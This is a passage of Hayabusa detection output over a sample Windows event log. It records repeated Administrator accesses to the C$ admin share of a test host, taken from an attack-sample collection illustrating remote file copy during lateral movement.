Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules : IP Address: 